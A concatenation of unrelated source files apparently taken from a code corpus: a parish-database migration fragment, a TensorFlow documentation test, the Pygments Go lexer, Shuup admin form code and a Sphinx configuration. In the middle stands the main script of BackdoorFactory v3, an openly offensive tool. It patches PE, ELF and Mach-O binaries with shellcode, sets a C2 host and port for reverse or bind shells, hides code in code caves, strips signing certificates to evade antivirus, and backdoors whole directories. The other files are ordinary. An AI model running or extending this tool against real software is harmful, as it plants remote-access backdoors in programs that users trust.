mobile=parishioner.mobile,
other_phone=parishioner.other,
email=parishioner.email,
parishioner_reference_no=parishioner.reference_no,
)
communication_preferences = CommunicationPermission(
person,
parishioner.main_contact == IS_PRIMARY,
INITIAL_GDPR_SURVEY,
parishioner.by_email in TRUE_STRINGS,
parishioner.by_phone in TRUE_STRINGS,
parishioner.by_post in TRUE_STRINGS,
parishioner.news in TRUE_STRINGS,
parishioner.finance in TRUE_STRINGS,
)
new_entities += [person, communication_preferences]
return new_entities
def reorganise_parishioners(session, parishioners, address_map):
household_map = {}
for parishioner in parishioners:
new_entities = _reorganise_parishioner(parishioner, address_map, household_map)
session.add_all(new_entities) | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env python
'''
BackdoorFactory (BDF) v3 - FOUNTAINPATCH
Many thanks to Ryan O'Neill --ryan 'at' codeslum <d ot> org--
Without him, I would still be trying to do stupid things
with the elf format.
Also thanks to Silvio Cesare with his 1998 paper
(http://vxheaven.org/lib/vsc01.html) which these ELF patching
techniques are based on.
Special thanks to Travis Morrow for poking holes in my ideas.
Copyright (c) 2013-2015, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
import sys
import os
import signal
import time
from random import choice
from optparse import OptionParser
from pebin import pebin
from elfbin import elfbin
from machobin import machobin
def signal_handler(signal, frame):
print '\nProgram Exit'
sys.exit(0)
class bdfMain():
version = """\
Version: 3.0.5
"""
author = """\
Author: Joshua Pitts
Email: the.midnite.runr[-at ]gmail<d o-t>com
Twitter: @midnite_runr
IRC: freenode.net #BDFactory
"""
#ASCII ART
menu = ["-.(`-') (`-') _ <-"
".(`-') _(`-') (`-')\n"
"__( OO) (OO ).-/ _ __( OO)"
"( (OO ).-> .-> .-> <-.(OO ) \n"
"'-'---.\ / ,---. \-,-----.'-'. ,--"
".\ .'_ (`-')----. (`-')----. ,------,) \n"
"| .-. (/ | \ /`.\ | .--./| .' /"
"'`'-..__)( OO).-. '( OO).-. '| /`. ' \n"
"| '-' `.) '-'|_.' | /_) (`-')| /)"
"| | ' |( _) | | |( _) | | || |_.' | \n"
"| /`'. |(| .-. | || |OO )| . ' |"
" | / : \| |)| | \| |)| || . .' \n"
"| '--' / | | | |(_' '--'\| |\ \|"
" '-' / ' '-' ' ' '-' '| |\ \ \n"
"`------' `--' `--' `-----'`--' '--'"
"`------' `-----' `-----' `--' '--' \n"
" (`-') _ (`-') "
" (`-') \n"
" <-. (OO ).-/ _ ( OO).-> "
" .-> <-.(OO ) .-> \n"
"(`-')-----./ ,---. \-,-----./ '._"
" (`-')----. ,------,) ,--.' ,-. \n"
"(OO|(_\---'| \ /`.\ | .--./|'--...__)"
"( OO).-. '| /`. '(`-')'.' / \n"
" / | '--. '-'|_.' | /_) (`-')`--. .--'"
"( _) | | || |_.' |(OO \ / \n"
" \_) .--'(| .-. | || |OO ) | | "
" \| |)| || . .' | / /) \n"
" `| |_) | | | |(_' '--'\ | | "
" ' '-' '| |\ \ `-/ /` \n"
" `--' `--' `--' `-----' `--' "
" `-----' `--' '--' `--' \n",
"__________ "
" __ .___ \n"
"\______ \_____ ____ "
"| | __ __| _/____ ___________ \n"
" | | _/\__ \ _/ ___\|"
" |/ // __ |/ _ \ / _ \_ __ \ \n"
" | | \ / __ \\\\ \__"
"_| </ /_/ ( <_> | <_> ) | \/\n"
" |______ /(____ /\___ >"
"__|_ \____ |\____/ \____/|__| \n"
" \/ \/ \/"
" \/ \/ \n"
"___________ "
"__ \n"
"\_ _____/____ _____/"
" |_ ___________ ___.__. \n"
" | __) \__ \ _/ ___\ "
" __\/ _ \_ __ < | | \n"
" | \ / __ \\\\ \__"
"_| | ( <_> ) | \/\___ | \n"
" \___ / (____ /\___ >_"
"_| \____/|__| / ____| \n"
" \/ \/ \/ "
" \/ \n",
" ____ ____ ______ "
" __ \n"
" / __ )/ __ \/ ____/___ "
"______/ /_____ _______ __\n"
" / __ / / / / /_ / __ `/"
" ___/ __/ __ \/ ___/ / / /\n"
" / /_/ / /_/ / __/ / /_/ /"
" /__/ /_/ /_/ / / / /_/ /\n"
"/_____/_____/_/ \__,_/"
"\___/\__/\____/_/ \__, /\n"
" "
" /____/\n"]
signal.signal(signal.SIGINT, signal_handler)
parser = OptionParser()
parser.add_option("-f", "--file", dest="FILE", action="store",
type="string",
help="File to backdoor")
parser.add_option("-s", "--shell", default="show", dest="SHELL",
action="store", type="string",
help="Payloads that are available for use."
" Use 'show' to see payloads."
)
parser.add_option("-H", "--hostip", default=None, dest="HOST",
action="store", type="string",
help="IP of the C2 for reverse connections.")
parser.add_option("-P", "--port", default=None, dest="PORT",
action="store", type="int",
help="The port to either connect back to for reverse "
"shells or to listen on for bind shells")
parser.add_option("-J", "--cave_jumping", dest="CAVE_JUMPING",
default=False, action="store_true",
help="Select this options if you want to use code cave"
" jumping to further hide your shellcode in the binary."
)
parser.add_option("-a", "--add_new_section", default=False,
dest="ADD_SECTION", action="store_true",
help="Mandating that a new section be added to the "
"exe (better success) but less av avoidance")
parser.add_option("-U", "--user_shellcode", default=None,
dest="SUPPLIED_SHELLCODE", action="store",
help="User supplied shellcode, make sure that it matches"
" the architecture that you are targeting."
)
parser.add_option("-c", "--cave", default=False, dest="FIND_CAVES",
action="store_true",
help="The cave flag will find code caves that "
"can be used for stashing shellcode. "
"This will print to all the code caves "
"of a specific size."
"The -l flag can be use with this setting.")
parser.add_option("-l", "--shell_length", default=380, dest="SHELL_LEN",
action="store", type="int",
help="For use with -c to help find code "
"caves of different sizes")
parser.add_option("-o", "--output-file", default=None, dest="OUTPUT",
action="store", type="string",
help="The backdoor output file")
parser.add_option("-n", "--section", default="sdata", dest="NSECTION",
action="store", type="string",
help="New section name must be "
"less than seven characters")
parser.add_option("-d", "--directory", dest="DIR", action="store",
type="string",
help="This is the location of the files that "
"you want to backdoor. "
"You can make a directory of file backdooring faster by "
"forcing the attaching of a codecave "
"to the exe by using the -a setting.")
parser.add_option("-w", "--change_access", default=True,
dest="CHANGE_ACCESS", action="store_false",
help="This flag changes the section that houses "
"the codecave to RWE. Sometimes this is necessary. "
"Enabled by default. If disabled, the "
"backdoor may fail.")
parser.add_option("-i", "--injector", default=False, dest="INJECTOR",
action="store_true",
help="This command turns the backdoor factory in a "
"hunt and shellcode inject type of mechanism. Edit "
"the target settings in the injector module.")
parser.add_option("-u", "--suffix", default=".old", dest="SUFFIX",
action="store", type="string",
help="For use with injector, places a suffix"
" on the original file for easy recovery")
parser.add_option("-D", "--delete_original", dest="DELETE_ORIGINAL",
default=False, action="store_true",
help="For use with injector module. This command"
" deletes the original file. Not for use in production "
"systems. *Author not responsible for stupid uses.*")
parser.add_option("-O", "--disk_offset", dest="DISK_OFFSET", default=0,
type="int", action="store",
help="Starting point on disk offset, in bytes. "
"Some authors want to obfuscate their on disk offset "
"to avoid reverse engineering, if you find one of those "
"files use this flag, after you find the offset.")
parser.add_option("-S", "--support_check", dest="SUPPORT_CHECK",
default=False, action="store_true",
help="To determine if the file is supported by BDF prior"
" to backdooring the file. For use by itself or with "
"verbose. This check happens automatically if the "
"backdooring is attempted."
)
parser.add_option("-M", "--cave-miner", dest="CAVE_MINER", default=False, action="store_true",
help="Future use, to help determine smallest shellcode possible in a PE file"
)
parser.add_option("-q", "--no_banner", dest="NO_BANNER", default=False, action="store_true",
help="Kills the banner."
)
parser.add_option("-v", "--verbose", default=False, dest="VERBOSE",
action="store_true",
help="For debug information output.")
parser.add_option("-T", "--image-type", dest="IMAGE_TYPE", default="ALL",
type='string',
action="store", help="ALL, x86, or x64 type binaries only. Default=ALL")
parser.add_option("-Z", "--zero_cert", dest="ZERO_CERT", default=True, action="store_false",
help="Allows for the overwriting of the pointer to the PE certificate table"
" effectively removing the certificate from the binary for all intents"
" and purposes."
)
parser.add_option("-R", "--runas_admin", dest="CHECK_ADMIN", default=False, action="store_true",
help="Checks the PE binaries for \'requestedExecutionLevel level=\"highestAvailable\"\'"
". If this string is included in the binary, it must run as system/admin. Doing this "
"slows patching speed significantly."
)
parser.add_option("-L", "--patch_dll", dest="PATCH_DLL", default=True, action="store_false",
help="Use this setting if you DON'T want to patch DLLs. Patches by default."
)
parser.add_option("-F", "--fat_priority", dest="FAT_PRIORITY", default="x64", action="store",
help="For MACH-O format. If fat file, focus on which arch to patch. Default "
"is x64. To force x86 use -F x86, to force both archs use -F ALL."
)
parser.add_option("-B", "--beacon", dest="BEACON", default=15, action="store", type="int",
help="For payloads that have the ability to beacon out, set the time in secs"
)
parser.add_option("-m", "--patch-method", dest="PATCH_METHOD", default="manual", action="store",
type="string", help="Patching methods for PE files, 'manual' and 'automatic'")
(options, args) = parser.parse_args()
def basicDiscovery(FILE):
macho_supported = ['\xcf\xfa\xed\xfe', '\xca\xfe\xba\xbe',
'\xce\xfa\xed\xfe',
]
testBinary = open(FILE, 'rb')
header = testBinary.read(4)
testBinary.close()
if 'MZ' in header:
return 'PE'
elif 'ELF' in header:
return 'ELF'
elif header in macho_supported:
return "MACHO"
else:
'Only support ELF, PE, and MACH-O file formats'
return None
if options.NO_BANNER is False:
print choice(menu)
print author
print version
time.sleep(1)
else:
print "\t Backdoor Factory"
print author
print version
if options.DIR:
for root, subFolders, files in os.walk(options.DIR):
for _file in files:
options.FILE = os.path.join(root, _file)
if os.path.isdir(options.FILE) is True:
print "Directory found, continuing"
continue
is_supported = basicDiscovery(options.FILE)
if is_supported is "PE":
supported_file = pebin(options.FILE,
options.OUTPUT,
options.SHELL,
options.NSECTION,
options.DISK_OFFSET,
options.ADD_SECTION,
options.CAVE_JUMPING,
options.PORT,
options.HOST,
options.SUPPLIED_SHELLCODE,
options.INJECTOR,
options.CHANGE_ACCESS,
options.VERBOSE,
options.SUPPORT_CHECK,
options.SHELL_LEN,
options.FIND_CAVES,
options.SUFFIX,
options.DELETE_ORIGINAL,
options.CAVE_MINER,
options.IMAGE_TYPE,
options.ZERO_CERT,
options.CHECK_ADMIN,
options.PATCH_DLL,
options.PATCH_METHOD
)
elif is_supported is "ELF":
supported_file = elfbin(options.FILE,
options.OUTPUT,
options.SHELL,
options.HOST,
options.PORT,
options.SUPPORT_CHECK,
options.FIND_CAVES,
options.SHELL_LEN,
options.SUPPLIED_SHELLCODE,
options.IMAGE_TYPE
)
elif is_supported is "MACHO":
supported_file = machobin(options.FILE,
options.OUTPUT,
options.SHELL,
options.HOST,
options.PORT,
options.SUPPORT_CHECK,
options.SUPPLIED_SHELLCODE,
options.FAT_PRIORITY,
options.BEACON
)
if options.SUPPORT_CHECK is True:
if os.path.isfile(options.FILE):
is_supported = False
print "file", options.FILE
try:
is_supported = supported_file.support_check()
except Exception, e:
is_supported = False
print 'Exception:', str(e), '%s' % options.FILE
if is_supported is False or is_supported is None:
print "%s is not supported." % options.FILE
#continue
else:
print "%s is supported." % options.FILE
# if supported_file.flItms['runas_admin'] is True:
# print "%s must be run as admin." % options.FILE
print "*" * 50
if options.SUPPORT_CHECK is True:
sys.exit()
print ("You are going to backdoor the following "
"items in the %s directory:"
% options.DIR)
dirlisting = os.listdir(options.DIR)
for item in dirlisting:
print " {0}".format(item)
answer = raw_input("Do you want to continue? (yes/no) ")
if 'yes' in answer.lower():
for item in dirlisting:
#print item
print "*" * 50
options.File = options.DIR + '/' + item
if os.path.isdir(options.FILE) is True:
print "Directory found, continuing"
continue
print ("backdooring file %s" % item)
result = None
is_supported = basicDiscovery(options.FILE)
try:
if is_supported is "PE":
supported_file = pebin(options.FILE,
options.OUTPUT,
options.SHELL,
options.NSECTION,
options.DISK_OFFSET,
options.ADD_SECTION,
options.CAVE_JUMPING,
options.PORT,
options.HOST,
options.SUPPLIED_SHELLCODE,
options.INJECTOR,
options.CHANGE_ACCESS,
options.VERBOSE,
options.SUPPORT_CHECK,
options.SHELL_LEN,
options.FIND_CAVES,
options.SUFFIX,
options.DELETE_ORIGINAL,
options.CAVE_MINER,
options.IMAGE_TYPE,
options.ZERO_CERT,
options.CHECK_ADMIN,
options.PATCH_DLL,
options.PATCH_METHOD
)
supported_file.OUTPUT = None
supported_file.output_options()
result = supported_file.patch_pe()
elif is_supported is "ELF":
supported_file = elfbin(options.FILE,
options.OUTPUT,
options.SHELL,
options.HOST,
options.PORT,
options.SUPPORT_CHECK,
options.FIND_CAVES,
options.SHELL_LEN,
options.SUPPLIED_SHELLCODE,
options.IMAGE_TYPE
)
supported_file.OUTPUT = None
supported_file.output_options()
result = supported_file.patch_elf()
elif is_supported is "MACHO":
supported_file = machobin(options.FILE,
options.OUTPUT,
options.SHELL,
options.HOST,
options.PORT,
options.SUPPORT_CHECK,
options.SUPPLIED_SHELLCODE,
options.FAT_PRIORITY,
options.BEACON
)
supported_file.OUTPUT = None
supported_file.output_options()
result = supported_file.patch_macho()
if result is None:
print 'Not Supported. Continuing'
continue
else:
print ("[*] File {0} is in backdoored "
"directory".format(supported_file.FILE))
except Exception as e:
print "DIR ERROR", str(e)
else:
print("Goodbye")
sys.exit()
if options.INJECTOR is True:
supported_file = pebin(options.FILE,
options.OUTPUT,
options.SHELL,
options.NSECTION,
options.DISK_OFFSET,
options.ADD_SECTION,
options.CAVE_JUMPING,
options.PORT,
options.HOST,
options.SUPPLIED_SHELLCODE,
options.INJECTOR,
options.CHANGE_ACCESS,
options.VERBOSE,
options.SUPPORT_CHECK,
options.SHELL_LEN,
options.FIND_CAVES,
options.SUFFIX,
options.DELETE_ORIGINAL,
options.IMAGE_TYPE,
options.ZERO_CERT,
options.CHECK_ADMIN,
options.PATCH_DLL,
options.PATCH_METHOD
)
supported_file.injector()
sys.exit()
if not options.FILE:
parser.print_help()
sys.exit()
#OUTPUT = output_options(options.FILE, options.OUTPUT)
is_supported = basicDiscovery(options.FILE)
if is_supported is "PE":
supported_file = pebin(options.FILE,
options.OUTPUT,
options.SHELL,
options.NSECTION,
options.DISK_OFFSET,
options.ADD_SECTION,
options.CAVE_JUMPING,
options.PORT,
options.HOST,
options.SUPPLIED_SHELLCODE,
options.INJECTOR,
options.CHANGE_ACCESS,
options.VERBOSE,
options.SUPPORT_CHECK,
options.SHELL_LEN,
options.FIND_CAVES,
options.SUFFIX,
options.DELETE_ORIGINAL,
options.CAVE_MINER,
options.IMAGE_TYPE,
options.ZERO_CERT,
options.CHECK_ADMIN,
options.PATCH_DLL,
options.PATCH_METHOD
)
elif is_supported is "ELF":
supported_file = elfbin(options.FILE,
options.OUTPUT,
options.SHELL,
options.HOST,
options.PORT,
options.SUPPORT_CHECK,
options.FIND_CAVES,
options.SHELL_LEN,
options.SUPPLIED_SHELLCODE,
options.IMAGE_TYPE
)
elif is_supported is "MACHO":
supported_file = machobin(options.FILE,
options.OUTPUT,
options.SHELL,
options.HOST,
options.PORT,
options.SUPPORT_CHECK,
options.SUPPLIED_SHELLCODE,
options.FAT_PRIORITY,
options.BEACON
)
else:
print "Not supported."
sys.exit()
result = supported_file.run_this()
if result is True and options.SUPPORT_CHECK is False:
print "File {0} is in the 'backdoored' directory".format(os.path.basename(supported_file.OUTPUT))
#END BDF MAIN
if __name__ == "__main__":
bdfMain() | unknown | codeparrot/codeparrot-clean | ||
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tools.docs.doc_generator_visitor."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import types
from tensorflow.python.platform import googletest
from tensorflow.tools.docs import doc_generator_visitor
from tensorflow.tools.docs import generate_lib
class NoDunderVisitor(doc_generator_visitor.DocGeneratorVisitor):
def __call__(self, parent_name, parent, children):
"""Drop all the dunder methods to make testing easier."""
children = [
(name, obj) for (name, obj) in children if not name.startswith('_')
]
super(NoDunderVisitor, self).__call__(parent_name, parent, children)
class DocGeneratorVisitorTest(googletest.TestCase):
def test_call_module(self):
visitor = doc_generator_visitor.DocGeneratorVisitor()
visitor(
'doc_generator_visitor', doc_generator_visitor,
[('DocGeneratorVisitor', doc_generator_visitor.DocGeneratorVisitor)])
self.assertEqual({'doc_generator_visitor': ['DocGeneratorVisitor']},
visitor.tree)
self.assertEqual({
'doc_generator_visitor': doc_generator_visitor,
'doc_generator_visitor.DocGeneratorVisitor':
doc_generator_visitor.DocGeneratorVisitor,
}, visitor.index)
def test_call_class(self):
visitor = doc_generator_visitor.DocGeneratorVisitor()
visitor(
'DocGeneratorVisitor', doc_generator_visitor.DocGeneratorVisitor,
[('index', doc_generator_visitor.DocGeneratorVisitor.index)])
self.assertEqual({'DocGeneratorVisitor': ['index']},
visitor.tree)
self.assertEqual({
'DocGeneratorVisitor': doc_generator_visitor.DocGeneratorVisitor,
'DocGeneratorVisitor.index':
doc_generator_visitor.DocGeneratorVisitor.index
}, visitor.index)
def test_call_raises(self):
visitor = doc_generator_visitor.DocGeneratorVisitor()
with self.assertRaises(RuntimeError):
visitor('non_class_or_module', 'non_class_or_module_object', [])
def test_duplicates_module_class_depth(self):
class Parent(object):
class Nested(object):
pass
tf = types.ModuleType('tf')
tf.Parent = Parent
tf.submodule = types.ModuleType('submodule')
tf.submodule.Parent = Parent
visitor = generate_lib.extract(
[('tf', tf)],
private_map={},
do_not_descend_map={},
visitor_cls=NoDunderVisitor)
self.assertEqual({
'tf.submodule.Parent':
sorted([
'tf.Parent',
'tf.submodule.Parent',
]),
'tf.submodule.Parent.Nested':
sorted([
'tf.Parent.Nested',
'tf.submodule.Parent.Nested',
]),
}, visitor.duplicates)
self.assertEqual({
'tf.Parent.Nested': 'tf.submodule.Parent.Nested',
'tf.Parent': 'tf.submodule.Parent',
}, visitor.duplicate_of)
self.assertEqual({
id(Parent): 'tf.submodule.Parent',
id(Parent.Nested): 'tf.submodule.Parent.Nested',
id(tf): 'tf',
id(tf.submodule): 'tf.submodule',
}, visitor.reverse_index)
def test_duplicates_contrib(self):
class Parent(object):
pass
tf = types.ModuleType('tf')
tf.contrib = types.ModuleType('contrib')
tf.submodule = types.ModuleType('submodule')
tf.contrib.Parent = Parent
tf.submodule.Parent = Parent
visitor = generate_lib.extract(
[('tf', tf)],
private_map={},
do_not_descend_map={},
visitor_cls=NoDunderVisitor)
self.assertEqual({
'tf.submodule.Parent':
sorted(['tf.contrib.Parent', 'tf.submodule.Parent']),
}, visitor.duplicates)
self.assertEqual({
'tf.contrib.Parent': 'tf.submodule.Parent',
}, visitor.duplicate_of)
self.assertEqual({
id(tf): 'tf',
id(tf.submodule): 'tf.submodule',
id(Parent): 'tf.submodule.Parent',
id(tf.contrib): 'tf.contrib',
}, visitor.reverse_index)
def test_duplicates_defining_class(self):
class Parent(object):
obj1 = object()
class Child(Parent):
pass
tf = types.ModuleType('tf')
tf.Parent = Parent
tf.Child = Child
visitor = generate_lib.extract(
[('tf', tf)],
private_map={},
do_not_descend_map={},
visitor_cls=NoDunderVisitor)
self.assertEqual({
'tf.Parent.obj1': sorted([
'tf.Parent.obj1',
'tf.Child.obj1',
]),
}, visitor.duplicates)
self.assertEqual({
'tf.Child.obj1': 'tf.Parent.obj1',
}, visitor.duplicate_of)
self.assertEqual({
id(tf): 'tf',
id(Parent): 'tf.Parent',
id(Child): 'tf.Child',
id(Parent.obj1): 'tf.Parent.obj1',
}, visitor.reverse_index)
def test_duplicates_module_depth(self):
class Parent(object):
pass
tf = types.ModuleType('tf')
tf.submodule = types.ModuleType('submodule')
tf.submodule.submodule2 = types.ModuleType('submodule2')
tf.Parent = Parent
tf.submodule.submodule2.Parent = Parent
visitor = generate_lib.extract(
[('tf', tf)],
private_map={},
do_not_descend_map={},
visitor_cls=NoDunderVisitor)
self.assertEqual({
'tf.Parent': sorted(['tf.Parent', 'tf.submodule.submodule2.Parent']),
}, visitor.duplicates)
self.assertEqual({
'tf.submodule.submodule2.Parent': 'tf.Parent'
}, visitor.duplicate_of)
self.assertEqual({
id(tf): 'tf',
id(tf.submodule): 'tf.submodule',
id(tf.submodule.submodule2): 'tf.submodule.submodule2',
id(Parent): 'tf.Parent',
}, visitor.reverse_index)
def test_duplicates_name(self):
class Parent(object):
obj1 = object()
Parent.obj2 = Parent.obj1
tf = types.ModuleType('tf')
tf.submodule = types.ModuleType('submodule')
tf.submodule.Parent = Parent
visitor = generate_lib.extract(
[('tf', tf)],
private_map={},
do_not_descend_map={},
visitor_cls=NoDunderVisitor)
self.assertEqual({
'tf.submodule.Parent.obj1':
sorted([
'tf.submodule.Parent.obj1',
'tf.submodule.Parent.obj2',
]),
}, visitor.duplicates)
self.assertEqual({
'tf.submodule.Parent.obj2': 'tf.submodule.Parent.obj1',
}, visitor.duplicate_of)
self.assertEqual({
id(tf): 'tf',
id(tf.submodule): 'tf.submodule',
id(Parent): 'tf.submodule.Parent',
id(Parent.obj1): 'tf.submodule.Parent.obj1',
}, visitor.reverse_index)
if __name__ == '__main__':
googletest.main() | unknown | codeparrot/codeparrot-clean | ||
# -*- coding: utf-8 -*-
"""
pygments.lexers.go
~~~~~~~~~~~~~~~~~~
Lexers for the Google Go language.
:copyright: Copyright 2006-2015 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import RegexLexer, bygroups, words
from pygments.token import Text, Comment, Operator, Keyword, Name, String, \
Number, Punctuation
__all__ = ['GoLexer']
class GoLexer(RegexLexer):
"""
For `Go <http://golang.org>`_ source.
.. versionadded:: 1.2
"""
name = 'Go'
filenames = ['*.go']
aliases = ['go']
mimetypes = ['text/x-gosrc']
flags = re.MULTILINE | re.UNICODE
tokens = {
'root': [
(r'\n', Text),
(r'\s+', Text),
(r'\\\n', Text), # line continuations
(r'//(.*?)\n', Comment.Single),
(r'/(\\\n)?[*](.|\n)*?[*](\\\n)?/', Comment.Multiline),
(r'(import|package)\b', Keyword.Namespace),
(r'(var|func|struct|map|chan|type|interface|const)\b',
Keyword.Declaration),
(words((
'break', 'default', 'select', 'case', 'defer', 'go',
'else', 'goto', 'switch', 'fallthrough', 'if', 'range',
'continue', 'for', 'return'), suffix=r'\b'),
Keyword),
(r'(true|false|iota|nil)\b', Keyword.Constant),
# It seems the builtin types aren't actually keywords, but
# can be used as functions. So we need two declarations.
(words((
'uint', 'uint8', 'uint16', 'uint32', 'uint64',
'int', 'int8', 'int16', 'int32', 'int64',
'float', 'float32', 'float64',
'complex64', 'complex128', 'byte', 'rune',
'string', 'bool', 'error', 'uintptr',
'print', 'println', 'panic', 'recover', 'close', 'complex',
'real', 'imag', 'len', 'cap', 'append', 'copy', 'delete',
'new', 'make'), suffix=r'\b(\()'),
bygroups(Name.Builtin, Punctuation)),
(words((
'uint', 'uint8', 'uint16', 'uint32', 'uint64',
'int', 'int8', 'int16', 'int32', 'int64',
'float', 'float32', 'float64',
'complex64', 'complex128', 'byte', 'rune',
'string', 'bool', 'error', 'uintptr'), suffix=r'\b'),
Keyword.Type),
# imaginary_lit
(r'\d+i', Number),
(r'\d+\.\d*([Ee][-+]\d+)?i', Number),
(r'\.\d+([Ee][-+]\d+)?i', Number),
(r'\d+[Ee][-+]\d+i', Number),
# float_lit
(r'\d+(\.\d+[eE][+\-]?\d+|'
r'\.\d*|[eE][+\-]?\d+)', Number.Float),
(r'\.\d+([eE][+\-]?\d+)?', Number.Float),
# int_lit
# -- octal_lit
(r'0[0-7]+', Number.Oct),
# -- hex_lit
(r'0[xX][0-9a-fA-F]+', Number.Hex),
# -- decimal_lit
(r'(0|[1-9][0-9]*)', Number.Integer),
# char_lit
(r"""'(\\['"\\abfnrtv]|\\x[0-9a-fA-F]{2}|\\[0-7]{1,3}"""
r"""|\\u[0-9a-fA-F]{4}|\\U[0-9a-fA-F]{8}|[^\\])'""",
String.Char),
# StringLiteral
# -- raw_string_lit
(r'`[^`]*`', String),
# -- interpreted_string_lit
(r'"(\\\\|\\"|[^"])*"', String),
# Tokens
(r'(<<=|>>=|<<|>>|<=|>=|&\^=|&\^|\+=|-=|\*=|/=|%=|&=|\|=|&&|\|\|'
r'|<-|\+\+|--|==|!=|:=|\.\.\.|[+\-*/%&])', Operator),
(r'[|^<>=!()\[\]{}.,;:]', Punctuation),
# identifier
(r'[^\W\d]\w*', Name.Other),
]
} | unknown | codeparrot/codeparrot-clean | ||
# -*- coding: utf-8 -*-
# This file is part of Shuup.
#
# Copyright (c) 2012-2017, Shoop Commerce Ltd. All rights reserved.
#
# This source code is licensed under the OSL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
from django import forms
from django.contrib.auth import get_user_model
from django.utils.translation import ugettext_lazy as _
from shuup.admin.form_part import FormPart, TemplatedFormDef
from shuup.admin.modules.contacts.forms import (
CompanyContactBaseForm, PersonContactBaseForm
)
from shuup.core.models import PersonContact
from shuup.utils.excs import Problem
from shuup.utils.form_group import FormDef
from shuup.utils.importing import cached_load
class CompanyContactBaseFormPart(FormPart):
priority = -1000
def get_form_defs(self):
yield TemplatedFormDef(
"base",
CompanyContactBaseForm,
template_name="shuup/admin/contacts/_edit_base_form.jinja",
required=True,
kwargs={"instance": self.object if self.object.pk else None}
)
def form_valid(self, form):
self.object = form["base"].save()
return self.object # Identity may have changed (not the original object we put in)
class PersonContactBaseFormPart(FormPart):
priority = -1000
def get_user(self):
bind_user_id = self.request.GET.get("user_id")
if bind_user_id:
bind_user = get_user_model().objects.get(pk=bind_user_id)
if PersonContact.objects.filter(user=bind_user).exists():
raise Problem(_("User %(bind_user)s already has a contact", bind_user=bind_user))
else:
bind_user = None
return bind_user
def get_form_defs(self):
yield TemplatedFormDef(
"base",
PersonContactBaseForm,
template_name="shuup/admin/contacts/_edit_base_form.jinja",
required=True,
kwargs={"instance": self.object if self.object.pk else None, "user": self.get_user()}
)
def form_valid(self, form):
self.object = form["base"].save()
return self.object # Identity may have changed (not the original object we put in)
class ContactAddressesFormPart(FormPart):
priority = -900
def get_form_defs(self):
initial = {} # TODO: should we do this? model_to_dict(self.object, AddressForm._meta.fields)
address_form_class = cached_load("SHUUP_ADDRESS_MODEL_FORM")
yield FormDef(
name="shipping_address", form_class=address_form_class,
required=False, kwargs={"instance": self.object.default_shipping_address, "initial": initial}
)
yield FormDef(
name="billing_address", form_class=address_form_class,
required=False, kwargs={"instance": self.object.default_billing_address, "initial": initial}
)
# Using a pseudo formdef to group the two actual formdefs...
yield TemplatedFormDef(
name="addresses", form_class=forms.Form,
required=False, template_name="shuup/admin/contacts/_edit_addresses_form.jinja"
)
def form_valid(self, form):
for obj_key, form_name in [
("default_shipping_address", "shipping_address"),
("default_billing_address", "billing_address"),
]:
addr_form = form[form_name]
if addr_form.changed_data:
addr = addr_form.save()
setattr(self.object, obj_key, addr)
self.object.save() | unknown | codeparrot/codeparrot-clean | ||
# -*- coding: utf-8 -*-
#
# Platypus documentation build configuration file, created by
# sphinx-quickstart on Wed Sep 16 16:15:02 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('..'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.todo',
'sphinx.ext.viewcode',
'sphinx.ext.pngmath',
'numpydoc'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Platypus'
copyright = u'2015, David Hadka'
author = u'David Hadka'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = ''
# The full version, including alpha/beta/rc tags.
release = ''
